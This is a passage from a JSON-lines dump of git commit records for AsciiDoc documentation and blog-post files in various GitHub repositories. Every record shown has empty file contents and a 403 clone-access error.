paraz\/spring-security,hippostar\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,caiwenshu\/spring-security,fhanik\/spring-security,izeye\/spring-security,thomasdarimont\/spring-security,MatthiasWinzeler\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,wkorando\/spring-security,pwheel\/spring-security,pwheel\/spring-security,Xcorpio\/spring-security,cyratech\/spring-security,adairtaosy\/spring-security,vitorgv\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,follow99\/spring-security,spring-projects\/spring-security,Xcorpio\/spring-security,raindev\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,pwheel\/spring-security,driftman\/spring-security,MatthiasWinzeler\/spring-security,mrkingybc\/spring-security,rwinch\/spring-security,chinazhaoht\/spring-security,mparaz\/spring-security,chinazhaoht\/spring-security,hippostar\/spring-security,MatthiasWinzeler\/spring-security,mounb\/spring-security,fhanik\/spring-security,mparaz\/spring-security,olezhuravlev\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,wilkinsona\/spring-security,yinhe402\/spring-security,SanjayUser\/SpringSecurityPro,izeye\/spring-security,diegofernandes\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,ajdinhedzic\/spring-security,zhaoqin102\/spring-security,izeye\/spring-security,yinhe402\/spring-security,eddumelendez\/spring-security,Krasnyanskiy\/spring-security,spring-projects\/spring-security,raindev\/spring-security,fhanik\/spring-security,ajdinhedzic\/spring-security,ajdinhedzic\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,panchenko\/spring-security,spring-projects\/spring-security,xingguang2013\/spring-security,wkorando\/spring-security,djechelon\/spring-security,tekul\/spring-security,driftman\/spring-security,mdeinum\/spring-security,mounb\/spring-security,kazuki43zoo\/spring-security,tekul\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,diegofernandes\/spring-security,zgscwjm\/spring-security,Xcorpio\/spring-security,ollie314\/spring-security,Peter32\/spring-security,ractive\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,vitorgv\/spring-security,forestqqqq\/spring-security,pkdevbox\/spring-security,rwinch\/spring-security,rwinch\/spring-security,diegofernandes\/spring-security,forestqqqq\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,zhaoqin102\/spring-security,follow99\/spring-security,mounb\/spring-security,mrkingybc\/spring-security,spring-projects\/spring-security,ractive\/spring-security,olezhuravlev\/spring-security,MatthiasWinzeler\/spring-security,raindev\/spring-security,jgrandja\/spring-security,panchenko\/spring-security,kazuki43zoo\/spring-security,zhaoqin102\/spring-security,pkdevbox\/spring-security,pkdevbox\/spring-security,zshift\/spring-security,likaiwalkman\/spring-security,cyratech\/spring-security,cyratech\/spring-security,wkorando\/spring-security,caiwenshu\/spring-security,hippostar\/spring-security,driftman\/spring-security,fhanik\/spring-security,mounb\/spring-security,wkorando\/spring-security,diegofernandes\/spring-security,adairtaosy\/spring-security,likaiwalkman\/spring-security,liuguohua\/spring-security,xingguang2013\/spring-security,liuguohua\/spring-security,Krasnyanskiy\/spring-security,zgscwjm\/spring-security,ractive\/spring-security,zgscwjm\/spring-security,yinhe402\/spring-security,eddumelendez\/spring-security,tekul\/spring-security,thomasdarimont\/spring-security,driftman\/spring-security,panchenko\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1073a35b59dc2b8f26972e952e8d417faabdc1df","subject":"Update 2015-11-02-Second-post-test.adoc","message":"Update 2015-11-02-Second-post-test.adoc","repos":"csiebler\/hubpress-test,csiebler\/hubpress-test,csiebler\/hubpress-test","old_file":"_posts\/2015-11-02-Second-post-test.adoc","new_file":"_posts\/2015-11-02-Second-post-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csiebler\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08b49225fc97492978ed96bbb0979bc8f36cc50a","subject":"Update 2017-05-28-Case-expressions.adoc","message":"Update 2017-05-28-Case-expressions.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-28-Case-expressions.adoc","new_file":"_posts\/2017-05-28-Case-expressions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdb4377762f2d890af23a245f26257f9eca19e36","subject":"Update 3-3-2017-Matt-Does-Info-Sec.adoc","message":"Update 3-3-2017-Matt-Does-Info-Sec.adoc","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"_posts\/3-3-2017-Matt-Does-Info-Sec.adoc","new_file":"_posts\/3-3-2017-Matt-Does-Info-Sec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3469437fa366653562288130856bef01e2421bb","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/soviet_union_2_0.adoc","new_file":"content\/writings\/soviet_union_2_0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"de1f2727f4c7b79a04a8c40c6cefd2b4e3073662","subject":"Teste de inclus\u00e3o de documento com Asciidoctor","message":"Teste de inclus\u00e3o de documento com Asciidoctor\n","repos":"BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC","old_file":"MockAlert\/src\/main\/asciidoc\/index.adoc","new_file":"MockAlert\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BD-ITAC\/BD-ITAC.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a2d4abf8eb7ea05306aaded076737d8088ee7d1","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jakartaee\/jakartaee-9\/readme.adoc","new_file":"jakartaee\/jakartaee-9\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7343ba3ea4c2d6a0e5fa3c06274350c81176585","subject":"Renamed '_posts\/2017-09-09.adoc' to '_posts\/2017-09-09adoc.adoc'","message":"Renamed '_posts\/2017-09-09.adoc' to '_posts\/2017-09-09adoc.adoc'","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2017-09-09adoc.adoc","new_file":"_posts\/2017-09-09adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8afd4f3b63401f0e6e668303f815b55b01465ad7","subject":"rule clean up","message":"rule clean up\n","repos":"buschmais\/jqassistant-demo","old_file":"jqassistant\/modules.adoc","new_file":"jqassistant\/modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buschmais\/jqassistant-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdd11ef3e99852f94c39c157419fa2d58506abb1","subject":"Update 2014-05-11-C-S-S3-Checkbox.adoc","message":"Update 2014-05-11-C-S-S3-Checkbox.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2014-05-11-C-S-S3-Checkbox.adoc","new_file":"_posts\/2014-05-11-C-S-S3-Checkbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56cd63309c941ea147b8e624bd4e522c77e240fa","subject":"Update 2017-05-31-Lists-of-topics.adoc","message":"Update 2017-05-31-Lists-of-topics.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-05-31-Lists-of-topics.adoc","new_file":"_posts\/2017-05-31-Lists-of-topics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c993035c8ec0e200cccea14a403f2bdbe672baa","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b7948c975cf9cc8b22b4747ba52c1e36154606c","subject":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08148bf3bace79a0e6234c0567b8a7c173c7acb8","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/london-clj-sep.adoc","new_file":"content\/events\/2022\/london-clj-sep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9a4c29545f83bb1dad764622f3fb8d2cb3db457e","subject":"Update 2015-09-23-Story-of-my-Life.adoc","message":"Update 2015-09-23-Story-of-my-Life.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd9d26dfced6bff07e6a2375580fcca0cb993bbd","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ebab367b8a7d450e0c61dd97d2032d4752962ec","subject":"Update 2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","message":"Update 2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","new_file":"_posts\/2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5af6ae564d080c7c7c77626d88b7b2ec6381eeea","subject":"Change \"REST Verb\" to \"HTTP Verb\" (#34195)","message":"Change \"REST Verb\" to \"HTTP Verb\" (#34195)\n\n","repos":"GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2ac04d82f32ef75bc7376a669d1414b8098a780","subject":"add heart of clojure","message":"add heart of clojure\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/heartofclojure.adoc","new_file":"content\/events\/2019\/heartofclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7e6b99ca889d07f09ed8e28884c0bf14b45e8362","subject":"Update 2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","message":"Update 2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","new_file":"_posts\/2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb0e795973f8016e12ea0d07091f76e854f5a7a6","subject":"Update 2017-07-07-Lazy-programmers.adoc","message":"Update 2017-07-07-Lazy-programmers.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Lazy-programmers.adoc","new_file":"_posts\/2017-07-07-Lazy-programmers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce11fdd51a7cbebb98d6e406160d23c19c4ebb17","subject":"Fix javadoc link","message":"Fix javadoc link\n","repos":"robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3d3fa35ce065cc880fdd7cb63cc319830500a68","subject":"y2b create post iPhone 4S vs iPhone 4 Speed Benchmarks","message":"y2b create post iPhone 4S vs iPhone 4 Speed Benchmarks","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-11-iPhone-4S-vs-iPhone-4-Speed-Benchmarks.adoc","new_file":"_posts\/2011-10-11-iPhone-4S-vs-iPhone-4-Speed-Benchmarks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4183e6521974f1717545ad8c676cc4749360453","subject":"SWARM-i1618: Fixed documentation typos.","message":"SWARM-i1618: Fixed documentation typos.\n\nMotivation\n----------\nTo fix typos in the documentation\n\nModifications\n-------------\nDocumentation only\n\nResult\n------\nNo changes to product behaviour - documentation only\n","repos":"nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm","old_file":"docs\/howto\/create-a-fraction\/index.adoc","new_file":"docs\/howto\/create-a-fraction\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f84ba930057dbb89457eb456bda5c5965cc221f","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e5a26ec52a68e731008e933ef8bfccbd7f0459b","subject":"innodb_stats_on_metadata","message":"innodb_stats_on_metadata\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/08-install-mysql.adoc","new_file":"src\/sections\/08-install-mysql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99e5dd9e0c9e1dcc30af209e8a635253809b3e01","subject":"docs: add first parts of asciidoc documentation","message":"docs: add first parts of asciidoc documentation\n","repos":"mjaschen\/phpgeo","old_file":"docs\/phpgeo.adoc","new_file":"docs\/phpgeo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mjaschen\/phpgeo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fac62b04f81cef70711da5ce9a1d044298b26a6","subject":"Update 2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","message":"Update 2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a2ddc6b80e31271af57570cf8210a961416abb9","subject":"Update 2016-06-11-Main-Title-Subtitle.adoc","message":"Update 2016-06-11-Main-Title-Subtitle.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bf763309b6a0de19f79ec85571b12c0cf5ff3e8","subject":"Update 2017-03-14-Trying-out-OpenLDAP.adoc","message":"Update 2017-03-14-Trying-out-OpenLDAP.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-14-Trying-out-OpenLDAP.adoc","new_file":"_posts\/2017-03-14-Trying-out-OpenLDAP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc68f4732e57019ad3985413d48cabb6b1c2bf02","subject":"Update 2017-08-25-Thrasos-Secret-Code.adoc","message":"Update 2017-08-25-Thrasos-Secret-Code.adoc","repos":"thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io","old_file":"_posts\/2017-08-25-Thrasos-Secret-Code.adoc","new_file":"_posts\/2017-08-25-Thrasos-Secret-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrasos\/thrasos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca4039dce9741f44472ede190e2beb5b40388352","subject":"Publish 199399.adoc","message":"Publish 199399.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"199399.adoc","new_file":"199399.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b20940157f1ad6977b63da272450f18873c162ee","subject":"Update dbm-changelog-sync.adoc","message":"Update dbm-changelog-sync.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a3ca539ae5cfab286776ef9dace7be682cad77d","subject":"Add initial structure for toolchains doc","message":"Add initial structure for toolchains doc\n","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/jvm\/toolchains.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/jvm\/toolchains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindpirate\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5321d0dd893665985e11b203ccbab8c3ddfcb27f","subject":"add dutch clojure day 2019","message":"add dutch clojure day 2019\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/dutchclojureday.adoc","new_file":"content\/events\/2019\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cb2b34ad481c26b199d92e17518d49dd0251ec3d","subject":"y2b create post Apple iPhone 5 Unboxing (New iPhone 5 Unboxing \\u0026 Overview) [Launch Day iPhone 5 Unboxing]","message":"y2b create post Apple iPhone 5 Unboxing (New iPhone 5 Unboxing \\u0026 Overview) [Launch Day iPhone 5 Unboxing]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-20-Apple-iPhone-5-Unboxing-New-iPhone-5-Unboxing-u0026-Overview-Launch-Day-iPhone-5-Unboxing.adoc","new_file":"_posts\/2012-09-20-Apple-iPhone-5-Unboxing-New-iPhone-5-Unboxing-u0026-Overview-Launch-Day-iPhone-5-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2def022ae17aed853ef31acffde4b9b33be1777","subject":"Deadline","message":"Deadline\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching 4.adoc","new_file":"Git\/Git branching 4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7a83555dc65edaf24cfa031eaa799ccf9977a67","subject":"y2b create post Fujifilm Instax 210 Unboxing + Close Ups!","message":"y2b create post Fujifilm Instax 210 Unboxing + Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-19-Fujifilm-Instax-210-Unboxing--Close-Ups.adoc","new_file":"_posts\/2011-01-19-Fujifilm-Instax-210-Unboxing--Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0323934bd30460e15d7dcce95f3a7d243373c1e8","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 